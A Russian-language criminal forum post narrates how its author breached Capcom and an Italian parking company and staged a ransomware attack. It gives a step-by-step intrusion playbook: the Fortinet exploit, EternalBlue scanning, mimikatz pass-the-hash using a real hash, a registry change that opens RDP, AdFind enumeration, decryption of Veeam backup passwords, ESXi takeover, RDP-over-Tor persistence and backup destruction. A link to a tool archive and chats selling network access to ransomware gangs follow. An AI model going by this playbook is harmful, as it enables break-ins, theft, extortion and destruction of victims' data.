What's new
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

Вы думали, я вас не переиграю?

boriselcin

Light Weight
Депозит
$0
Дело о Kenzo Tsujimoto

Предисловие:

Прежде всего, в этом очерке, я хочу рассказать о том, что порог входа в пенетрирование сетей не такой высокий.
И, как не имея «0 дей» и «1 дей» - и даже не имея денег, можно нагнуть Capcom.

Осенью 2020 года мы нашли CVE-2018-13379.
Представляете, экслойт просто валялся на гите с 19 года- и его никто даже не пробывал использовать. А мы попробывали - но пришлось чутка доработать.
Как-то, в одну из ночей, кодер скинул новый материал с пометками. В одной из пометок я читаю: «capcom». По ходу какая доставка еды в японии - подумалось мне какая доставка???.
И я был приятно удивлен войдя в периметр.


Снимок экрана 2021-07-28 в 11.10.58 AM.png

Снимок экрана 2021-07-28 в 11.13.17 AM.png


Ремарка:
В конце текста, я проведу некей анализ рынка. Перед написанием статьи,
я специально искал выходы на приват пп. Мне удалось связаться с нефильмом и конти
Я выдал им по сети (те что сам не смог сделать ) и покажу вам что из этого вышло.

Все дело пенетрировалось на вирте вин сервер 2012

Сейчас эскплойт доступен в metasploit (search forti os)

Первоначальная разведка:
При подключении к впн- вам нужно обязательно снять роуты. Для этого был сляпан замечальнй скрипт, который их снимает и сканирует на уязвимости: «eternalblue» и «smbghost».

1. Укалдываем сканер на удобное место и
устанавливаем «Python 3 и nmap»;
2. Отрубаемся от впн;
3. Далее: cmd cd путь где валяються скрипы Python s.py - он снимает ваши роуты без подключения к впн и ждет появления новых;



Код: Скопировать в буфер обмена
Code:
C:\F>python s.py
[11:03:07][!] Parsing default routes ...
> 10.0.2.0/24
[11:03:07][*] Waiting for route changes ...
[11:03:08][*] Waiting for route changes ...
[11:03:09][*] Waiting for route changes ...
[11:03:10][*] Waiting for route changes ...
[11:03:11][*] Waiting for route changes ...
[11:03:12][*] Waiting for route changes ...
[11:03:13][*] Waiting for route changes ...
[11:03:14][*] Waiting for route changes ...
[11:03:15][*] Waiting for route changes ...

При подключении к Впн, он выполняет новые роуты и сам начнет их сканировать.

Код: Скопировать в буфер обмена
Code:
[11:04:55][+] Changes detected, following routes added:
> 10.60.0.0/16
> 10.70.0.0/16
> 10.80.0.0/16
> 10.90.0.0/16
> 10.209.174.0/23
> 10.249.0.0/16
> 172.16.0.0/16
> 192.168.2.0/23
> 192.168.255.0/26
[11:04:55][+] Launching multithreader scan ...

Жара пошла)))

Код: Скопировать в буфер обмена
Code:
11:04:55][+] Launching multithreader scan ...
10.90.1.3
10.80.72.19
10.249.2.37
10.249.2.38
10.249.2.42
10.249.2.43
10.90.1.6
> Vulnerable to EternalBlue!
> Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2
Standard 6.1)
10.80.72.20
> Vulnerable to EternalBlue!
> Windows Storage Server 2008 R2 Workgroup 7601 Service Pack 1 (Windows Stora
ge Server 2008 R2 Workgroup 6.1)
10.80.3.19
10.90.65.18
172.16.132.253
10.80.3.20
10.90.3.18

Hosts Vulnerable to EternalBlue (11):10.80.72.19, 10.90.1.6, 10.70.72.23, 10
0.24, 10.80.12.4, 10.80.47.4, 10.90.92.5, 10.249.52.89, 10.80.1.19, 10.80.1.
10.80.1.21

Неееереальная любовь реееально накрывала (*поет как Темникова)

Снимок экрана 2021-07-28 в 11.22.50 AM.png



В капкоме их было около 40 штук.
Для наглядного написания нашей статьи,
я взял в пример «циско впн» паркова в Италии.
SSL VPN Service

Корпа с небольшим ревеню и хорошей ифраструктурой (как выяснилось позже - ужасной). Данная корпа очень схожа с инфраструктурой капкома (такой же пиздец в плане безопасности).
Читая лог сканер, я понимал: в капкоме мы будем жить очень долго и лить даты очень хорошо...
Нужно осмотреться. Как мы это называем на своем сленге- «гниды» (виртуалки для пентеста). После того, как осмотрелись - гнидануться в сеть.

Для этих целей я использую мячик(он же софтперфект нет сканер).

SoftPerfect : system and network management software

SoftPerfect - Australian software development company. Free and commercial solutions for home, office, enterprise, local networks and the Internet.
www.softperfect.com
www.softperfect.com
Открываем сканер прыгаем в опшенс и настраиваем примерно так же. Затем файл импорт ип лист хостейм. И вписываем туда роуты капков (метропарка любой другой компании)

Снимок экрана 2021-07-27 в 8.39.17 PM.png

Снимок экрана 2021-07-27 в 8.39.36 PM.png

Снимок экрана 2021-07-27 в 8.39.40 PM.png

Снимок экрана 2021-07-27 в 8.39.48 PM.png

Снимок экрана 2021-07-27 в 8.42.55 PM.png



10.0.2.0/24
10.60.0.0/16
10.70.0.0/16
10.80.0.0/16
10.90.0.0/16
10.209.174.0/23
10.249.0.0/16
172.16.0.0/16
192.168.2.0/23
192.168.255.0/26

*Цитатка вспоминалась: «А сегодня в завтрашний день не все могут смотреть. Вернее смотреть могут не только лишь все, мало кто может это делать». (C)

Мячик нам выдаст примерную структуру сети (ту которую видно с вашей гниды - мы пока еще не внутри сети). Так мы определяем примерное наличие доменов и домен контролеров.
Имея креды в домене, даже юзерские, мы легко можем пробить етернал - даже метосплотовскими силами.

Вам я дарю «eternalblack» - никому хуже не станет от того, что я тут его выложу.
Данная улита написана автором плейбит. Для более удобного эсплуатироания eternalblue. В работе я использовал чистый пейлоад метерпретера, но можно использовать и какой-нибудь легитимный dll для создания юзера.
Работает утилита так: ebb.exe 10.80.23.19 ip youpaload.

Снимок экрана 2021-07-28 в 11.34.19 AM.png



Сессия пришла. Первое, что нужно сделать: net group "Domain Admins /domain".

Это вернёт нам домен-админов; в капкоме их было около 15.

Наша задача найти либо хэш, либо клир пасс домен админа. Если вы пошли по пути создания совего локального юзера, то просто снимайте lsass дампы и пихайте в мимик.
К 10 тачке у меня таки был их домен админ - «adm_babak».
Кстати, в метропарке у нас тоже есть, да.

c4dbf115be2a3348e01dac07e149774c

Result:
Not Found, it is being cracked by our background system.
Please wait up to 5 days. A notification email will be sent to you when it is cracked successful , otherwise it is cracked failure.

Не беда! есть pth
PASS-THE-HASH ATTACKS. Если простым языком - это даст нам авторизоваться в системе по хешу.
Обязательно качаем псекс - через него мы будем заходить на сервак, и делать «рестрикт админ»- что бы ворваться в рдп.

sekurlsa::pth /user:administrator /domain:SD0603159 /ntlm:c4dbf115be2a3348e01dac07e149774c

Код: Скопировать в буфер обмена
Code:
C:\>p.exe \\10.80.23.19 cmd

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Как мы видим, авторизовались без кредов. выполним

powershell.exe -nop -w hidden -ep bypass -c "New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force"
Нажмите, чтобы раскрыть...

Исполнение этой команды на их хосте, дало нам возможность подписать mstsc хэшем и зайти без пасса.
Гуд…, подпишем mstsc - я грабил даже там, где не был.

sekurlsa::pth /user:administrator /domain:SD0603159 /ntlm:c4dbf115be2a3348e01dac07e149774c /run:"mstsc.exe /restrictedadmin"



И вот мы в периметре:

Есть такой замечательный инструмент - «Adfind» называеться. Качнуть его можно в гугле. Как установите - создайте рядом с ним батник, и закиньте на комп в их сети , тоесть в домене. Главное, потом не забыть удалить.

Код: Скопировать в буфер обмена
Code:
adfind.exe -f (objectcategory=person) > ad_users.txt даст юзеров этом домене
adfind.exe -f objectcategory=computer > ad_computers.txt компы в том числе и трупы
adfind.exe -subnets -f (objectCategory=subnet) | findstr ">cn: " > ad_subnets.txt доп подсети что не снелись софтом
adfind.exe -f "(objectcategory=group)" > ad_group.txt группы
adfind.exe -gcb -sc trustdmp > ad_trustdmp.txt dc

На самом деле, в случаи метропарка, ситуация интересная: мы на контролере одного из доменов. В домене 2 компа, всего доменов около 30 штук - и все они имеют SD0603159, примерно вот такие название. И я уверен, что в каждом из них будет не более двух пк (это паркова 3 милиона ревеню).
*На самом деле, всё это не важно - я показываю метологию своей работы
Теперь нам нужно затянуть мячик на этот комп и просканировать сеть - уже из нутри домена. Это откроет полную картину сети. И тут мы плавненько переходим к поиску бекап систем файл-серверов и данных.

В течении пары часов была разложена вся структура capcom. Я выяснил, что за бекап систему отвечает «вис» (мы еще вернемся к нему и я покажу, как состилить пароли с вима). Данные лежат на насах,
вся корпа работает на 1 домене, а за инфраструктуру отвечает vmare esxi.

На тот момент, конечно, не было esxi. Решения у продукта, которым я лочил, поэтому сеть была накрыта изнутри (так делать не нужно) - если у вас сеть на esx,
вы лучше рвите жопу и ставьте esx.

Далее просиходили просто необъяснимые вещи: мы думали как нам не спалиться и скачать побольше даты.
Было выяснено, что админ Бабак - забытый богом админ. Я просто взял сервера у Редбира, поставил винspc и начал качать дату японцев. Вот тут началось самая жопа. Дату выбирали и качали мы месяца так полтора. 1тб - скорость выкачаки, была просто космос))) Все полтора месяца мы трясли башкой: «А вдруг придет пизда».
Но на вторую неделю я предложил дополнительно там закрепиться.
Я прокинуn рдп овер тор на 10 пк в сети.

qna.habr.com

Ðак оÑганизоваÑÑ RDP over Tor ÑеÑез hiddenservice?

ÐÑвеÑили на вопÑÐ¾Ñ 1 Ñеловек. ÐÑениÑе лÑÑÑие оÑвеÑÑ! РподпиÑиÑеÑÑ Ð½Ð° вопÑоÑ, ÑÑÐ¾Ð±Ñ ÑзнаваÑÑ Ð¾ поÑвлении новÑÑ Ð¾ÑвеÑов.
qna.habr.com
qna.habr.com

Прикладываю exe, который автоматически развернет вам рдв овер тор и сплюнет онион адрес, и можно будет подключаться по рдп через тор в сетку)
просто кликаете exe pass tor_socks.

На последней неделе перед атакой - впн отъебнулся и отвалились единсвенные креды в юсовом устрйовсе капкома. В раследовании они так и напишут - что мы зашли через Юсу.
Бекап-система капкома, как и почти в любой биллионой корпе, бекапила на съемные ленты и они вытаскивались (нам удалось уничтожить данные за 2 месяца).

*Кстати о стилинги паролей с вима:

1. зайдем на сам вим сервер качнем ssms https://docs.microsoft.com/en-us/sq...-management-studio-ssms?view=sql-server-ver15
2. Установим. Зачастую, потребуется ребут вим сервака. После ребута открываем «mssql managment studio», там авторизуемся под кредами нашего домен админа;
3. Выбираем базу данных Veeam;
4. И делаем такой запрос к этой бд:

SELECT TOP (1000) [id]
, [user_name]
, [password]
, [usn]
, [description]
, [visible]
, [change_time_utc]
FROM [VeeamBackup]. [Dbo]. [Credentials]
Нажмите, чтобы раскрыть...

Это вернет нам все хэши и юзернейма с бекап системы. И это значит: и от всего, что там есть- от все структуры esx, насы и так далее.
Но теперь нужно расколоть эти пасы.
Без проблем, пацаны.

Открываем повершелл:
Add-Type -Path "C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Common.dll"
Нажмите, чтобы раскрыть...

Далее:

$encoded = 'тут хэш'
Нажмите, чтобы раскрыть...

[Veeam.Backup.Common.ProtectedStorage]::GetLocalString($encoded) вернет клир пасс
Нажмите, чтобы раскрыть...

И вот мы собрали пароль от всего, что было в капкоме.

я хочу рассказать вам о своих недоработках, касаемо капкома, и как бы я сейчас сделал.
1)нанял бы инсдеров на работу с данными;
2)Уебал бы им вмвару вместе с гейм сервервами львиная доля,которых крутилась на линукс. Легло бы 400 тб данных на их esx.

Ну да ладно. По этому поводу я расскажу, как можно поработать с вмварой: сбросить пассы на esx, если их нет через вцентр.
В нашей ситуации, мы имеем креды от вцентра administrator@vsphere.local
Заходим в вцентр и выбираем esx хост, жмакаем Configuration.
Authentication Services - Properties Join Domain. На хосте в домене наберем systeminfo - он выплюнет домен вот в таком формате как там. Вставляем в поле домен,
далее вводим креды домен админа без домена - тоесть без DOMAIN\
Всё.
Теперь идём на контролер домена, там октрываем юзеры и компьютеры- и делаем там группу ESX Admins. Добавляем туда своего юзера.
Теперь можно зайти на esx через веб. Сбросить рут юзеру, включить ssh, выключить вирты, удалить снеп шоты и шифрануть - и ав вам не страшен.

После слива данных с капкома началась эпопея с тем, куда же мне поставить такую корпу. На тот момент, я работал с распиздяем «Локбитом», которого я неделю просил кастомизоровать записку. И я сообщал, что буду ставить капком - не получил ни ответа - ни привета.
Затем, я обратился к господину аннону из «Ревиллов».
Взял эти ваши «ревилы» погонять - меня не устроило вообще всё: как работает локер, в первую очередь. И то, что он там дал интервью уже, что будет гейм корпу ставить. Кто он вообще такой, чтобы вести такие разговоры? Если эту корпа моя и ставить её буду я.
Я им указал на ошибки - они сказали, что всё исправят, но ничего не исправлялось.
На тот момент мы вели задушевные беседы с овнером «Рагнара». Просто душевная общуха. Я с ними до этого не работал. Ну и я ему закинул такую тему - естественно всё срослось, мы быстро все поставили и капки легли.

Причины их отказа платить я описал выше.
Но главной причиной является то, что префектура японии им просто запретила нам заплатить. Но я уверен: если бы мы соблюли два пункта, описанных выше - всё было бы ок.

Как я писал в предисловии к этой статье: перед написанием материла я сконтачился «нефильами» и «конти». Выдал им по сети, что сам не смог сделать (я всегда боялся брать сети в работу у других людей).
Знаете, такие вот страхи, что я не потяну и будут в мою сторону предъявы. Но, на самом деле, ситуации, которые сегодня произошли - меня очень приподняли.

Ники на форумах не «Конти» и «нефильма» я светить не буду - просто скину переписки.

*Диалог с нефильмами (как всегда все охуенно топовые команда):
Даю точку входа впн юзер в домене.
Сам до этого взял н число доменов там.’

Спойлер
и будут как бы тоже не простые все
9:24 я по сути даю то что сам
9:24 не потянул
нефильмы@vipclub.pm
9:24 давай нормальное)
9:24 у нас больше шансов на выплату
9:24 без обид)
9:24 ы

я@exploit.im
9:24 да баратн нормальное я сам наебну
9:24 хех
нефильмы@vipclub.pm
9:24 не дело в скиле

я@exploit.im
9:24 какие у вас в нефильме условия?
нефильмы@vipclub.pm
9:24 20% от выплаты твои
9:24 от 100%
9:24 локер наш

я@exploit.im
9:24 не в скиле дело?)
нефильмы@vipclub.pm
9:24 ну в скиле

я@exploit.im
9:24 тоесть если я сам свою сеть на ваш локер поставлю
нефильмы@vipclub.pm
9:24 у нас по докам сильные людяхи сидят

я@exploit.im
9:25 я получу 20 процентов
9:25 ?
нефильмы@vipclub.pm
9:25 тоесть ты даешь нам сеть мы лочим мы тебе 20% от выплаты
9:25 от 100%
9:25 типо дадут 1кк 200к твои

я@exploit.im
9:26 ну ок как то дам парочку) просто не вижу смысла давать то что самому можно сделать
9:26 проблема в том
9:26 что вы не хотите взять на локер
9:26 хех
9:26 ну давай как то попробуем
нефильмы@vipclub.pm
9:26 nt,t kjrt
9:26 tebe loker nado?
9:26 20% nam otdavai ya tebe vudam

я@exploit.im
9:26 esxi есть?
нефильмы@vipclub.pm
9:27 -
9:27 ты
9:27 каким
9:27 локером работаешоь?

я@exploit.im
9:28
9:28 короче там где есть esx
9:28 но
9:28 мне нужно что. Бы esx
9:28 работало без костылей
9:28 что бы от 5 до 7й
9:30 знаешь сегодняшня ситуация меня приподняла
9:30 где то я думал что скила у меня не так много
9:30 сегодня я понял
9:30 скил у меня есть XD
нефильмы@vipclub.pm
9:31 ))
9:31 да ладно сейчас много умных ребят

я@exploit.im
9:31 Было бы грустно
9:31 если бы ты поднялся там
9:31 а я нет
9:31 )
9:32


тут я передаю им креды от доменов в корпе
нефильмы@vipclub.pm
9:32 петух
9:32 и
9:32 петухи
9:32 отрубили
9:32 все линки впн и тд
9:32 эти айти)
9:32 нельзя зайти
9:32 мб поднимут рано или поздно
9:32 и креды подойдут)
9:33 ыыы
9:33 красава) че
9:33 этим же юзером?

я@exploit.im
9:33 ну там как минимум 2 зерелогона
нефильмы@vipclub.pm
9:34 удар по самолюбию сейчас я буду наблюдать)

я@exploit.im
9:34 как минимум 6 етерналов
9:34 )
нефильмы@vipclub.pm
9:34 делать ее дальше?

я@exploit.im
9:34 ну ты же сказал
9:34 она упала
нефильмы@vipclub.pm
9:34 не я имел ввиду

я@exploit.im
9:34 делай я дал что было у меня
нефильмы@vipclub.pm
9:34 я через линки

я@exploit.im
9:34 это их клиенты
нефильмы@vipclub.pm
9:34 впны
9:34 да она работает

я@exploit.im
9:34 а нужен оснвоной домен
9:34 ихз
нефильмы@vipclub.pm
9:34 форти

я@exploit.im
9:34 там esxi
нефильмы@vipclub.pm
9:34 я имел ввиду

я@exploit.im
9:34 кластера
нефильмы@vipclub.pm
9:35 у них есть цитриксы и впны но они отключены

я@exploit.im
9:35 нужно врываться в домен TA
нефильмы@vipclub.pm
9:35 мб юзеры бы подошли

я@exploit.im
9:35 без 0 деев
9:35 там делать нехуй
9:35 у меня их нет
9:35 в TA Своим арсеналом я не попал
нефильмы@vipclub.pm
9:36 понял

я@exploit.im
9:36 креды стилить с вима умеешь?
нефильмы@vipclub.pm
9:36 я админ просто мне это все даже не интересно

я@exploit.im
9:37 локер интересно мне
нефильмы@vipclub.pm
9:37 я свое от сидел отдрочил 2 года назад)

я@exploit.im
9:37 больше чем твои пентестеры)
9:37 сорян)
нефильмы@vipclub.pm
9:37 ну смотри
9:37 мы можем предоставить
9:37 20% от выплаты нам, даешь мне заранее ав и почты
9:37 3 разных
9:37 в блоге будем размещать
9:37 если что


нефильмы@vipclub.pm
9:39 % kakoi ho4esh

я@exploit.im
9:39 это все зависит от суммы
9:39 можно и 40
9:39 если сумма ок
9:40 динамику
9:40 хочу
нефильмы@vipclub.pm
9:40 взять все не проблема)
9:40 и все самим сделать4



я@exploit.im
9:40 нефильмы@vipclub.pm
9:40

взять все не проблема)
9:40

и все самим сделать4
9:40 ну вот я дал тебе взять)
9:40 то что вы возьмете
9:40 я возьму тоже)
9:40 мне то какой толк
9:40 нихуя не делать я тоже не хочу
9:40 мне как бы нравиться
9:40 сетки ебашить
нефильмы@vipclub.pm
9:40 )))
9:41 дак можно и так и так)
9:41 и сам делать давать и давать что бы делали)
9:41 тоже сидеть никто нех очет)
9:41 в этом и прикол)

я@exploit.im
9:41 ну вот пердай своим что я дал
нефильмы@vipclub.pm
9:42 к
9:42 сек
9:42 никого нету завтра скину хочу сгеодня отдохнуть 4 дня не высыпался

я@exploit.im
9:42 отдыхай
9:42 )
9:43 знашеь никогда не радовался так тому что с корпой ничего не вышло
9:43 х#й знает
9:43 ахахах
9:43 приподняло
9:43 очень
нефильмы@vipclub.pm
9:43 думаю сейчас
9:43 зайдет кто дам
нефильмы@vipclub.pm
9:54 дал
9:54 ее

я@exploit.im
9:54 окей
9:54 )
нефильмы@vipclub.pm
9:55 удар по самолюбию
9:55 только что был)
9:55 хД
9:55 расслабились че то)

я@exploit.im
9:55 это по пентестерам твоим удар)
9:55 ты же просто админ
нефильмы@vipclub.pm
9:55 да мне терь интересно буду говорить ты не смог а он смог)
9:55 подьебывать)
9:56 поток сеток организуешь?)

я@exploit.im
9:56 ну я тебе уже сказал есть инетрес сови сети ставить условия я тоже тебе описал
9:56 если у вас крутые такие челы по дате
9:56 то что бы нет
нефильмы@vipclub.pm
9:56 30% и то я поговорю еще
9:57 может не соглас будет ну я уверен что не согласятся

я@exploit.im
9:57 дело их) мне как то похую)


я@exploit.im
10:06 Нужно жить настоящим и думать о будущем
нефильмы@vipclub.pm
10:06 да я вот думаю ))
нефильмы@vipclub.pm
10:13 взяли
10:13 ДА
10:13 хД
10:13 пишет спрашивает как ты это сделал)


я@exploit.im
10:14 и corporate
нефильмы@vipclub.pm
10:14 спрашивает
10:14 как ты это сделал
10:14 вообще
10:14 странно все перепробовали

я@exploit.im
10:14 ну как мимнимум скажи что там зерелогон
10:14 и 6 етернал блу
10:15 А сегодня в завтрашний день не все могут смотреть. Вернее смотреть могут не только лишь все, мало кто может это делать.
10:15 (С)
10:15 ) и да я вам дал в тех доменах которые сам взял
нефильмы@vipclub.pm
10:15 ща попадет
10:15 )
10:16 а в другие же не попадешь

я@exploit.im
10:17 без 0 деев врятли
10:17 еще
нефильмы@vipclub.pm
10:17 есть
10:17 0

я@exploit.im
10:17 vsphere.local
10:17 это вцентер
10:17 их
10:17 он на винде
10:17 в домене
10:18 vsphere.local
10:18 вам еще туда
10:18 )
10:18 попробуйте
нефильмы@vipclub.pm
10:20 дак его не видно

я@exploit.im
10:20 должно быть видно
10:20 роуты проскань
10:20 те что я скинул
нефильмы@vipclub.pm
10:20 к
10:20 ща сек
10:20 а все понял
10:21 это я кароч завтра дам инфу я спать

я@exploit.im
10:21 давай)
10:21 ты наврено с мыслями пойдешь нахуй вообще со мной связался
10:21 азахахаха
нефильмы@vipclub.pm
10:21 не
10:21 ы
10:21 он подьтянет
10:21 ща
10:22 сейчас они пусть ебутся
10:22 завтра после обеда будешь?

я@exploit.im
10:23 Да все лето буду почти всегда онлайн
нефильмы@vipclub.pm
10:23 ок завтра спишемся) поору

я@exploit.im
10:23 главное что бы не поорал)
нефильмы@vipclub.pm
10:23 такой удар по гордости))

я@exploit.im
10:23 еще сильней
нефильмы@vipclub.pm
10:23 =)))
10:23 до завтра бро

я@exploit.im
10:24 пока
нефильмы@vipclub.pm
10:24 черкани мне наф оруме в лс что бы не потерялся конаткт на всякий

я@exploit.im
10:25 дай линк
10:25 на профиль
10:25 а все
10:25 фарнетворк
10:25 да я помню
10:35 Статус: Auto Status (idle)

Как мы видим из переписки: админ этого «нефильма» ушёл спать очень недовольный своими пентестерами.

*А вот с конти:
Спойлер
conti
10:16 ага ну пока что в работе
10:16 они пропаченные там

я
10:16 я это знаю мужик
10:16 в целом от меня будут такие сети
10:16 так как там где могу я сам
10:16 у меня выходит
10:16 там где не вышло у меня
conti
10:16 мне самому интересно сам наверное подключусь )


Если их "команды" называются топовыми,
то кто тогда я?



Теперь давайте поговорим за команды команд АПТ ДТП ПТУ Хуиту.

Наша команда: кодер-питонист (кто собственно все эти паблики допиливал),
второй пентестер (мой ученик), третий пентестер-подмастерье (на тот момент принеси-подай), ну и собственно я.
Короче: Борис, Крюк, Биба и печник- вот и вся наша команда.
Лучше всех было Крюку- он получал ровную долю с проставок и сидел на жопе ровно. Мы же отрабатывали пульсы и фортики.
Я всегда говорил: пацаны, ищем выходы на 0 деи. Деньги есть - большие деньги. Но вся команда ныла: фортики фортики фортики, их на всю жизнь хватит…
Конечно, никто ничего не искал. Приходилось заниматься всем самому. Проблема в том, что я считал их «мои пацаны». А это бизнес - суровый бизнес. Здесь «моих пацанов» не существует. Если работают плохо и планы не совпадают- значит уже «не мои».
Нужно было их просто выдрачивать так, чтобы делали только то, что я им говорю.

Так что лучше работайте в одиночку, либо руководите умело. Сейчас я пошёл по пути работы в одного. И, знаете, кпд не упало, а только выросло. Откинул от себя ненужные контакты и ненужных мне людей.

Подводя итоги статьи, могу сказать, что пентест сетей не такой уж сложный процесс для изучения. Сложно этому кого-то учить (если изначально человек в теме на уровне ноль).
Так как вариантов решения одной задачи может быть масса. Но, в первую очередь, вам нужно влюбиться в пентест.
Ну как и в любую другую работу (а иначе это насилие над собой, а не работа).
Все методы, описанные мной, есть в гугле - на официальных сайтах продуктов.
Читайте больше обзоров аверов, читайте их Твитеры. Часто они описывают полную методологию какой-либо из атак.

P.S: Что касается метропарка - это обычный паркинг с данными камер. Поэтому далее его смотреть я не стал.
P.P.S: Вот вы гоните нас ссаной тряпкой: рансомщики - пидорасы. А мы есть будущее, прогнали нас отсюда - не беда
я строю уютный дом для нас...

*Выражаю особую благодарность овнеру рагнара - ты лютый чел, Спасибо тебе за то, что мы с тобой общались. И Unit8200 за то, что когда я начал интересоваться темой, ты мне сказал: «Иди нахуй, учись сам- есть гугл». Спасибо и тебе от души.

Инструменты
https://temp.sh/VUjYo/Shared.rar
Нажмите, чтобы раскрыть...

Вложения​

  • Снимок экрана 2021-07-27 в 8.36.28 PM.png
    Снимок экрана 2021-07-27 в 8.36.28 PM.png
    70.1 КБ · Просмотры: 546
 
Top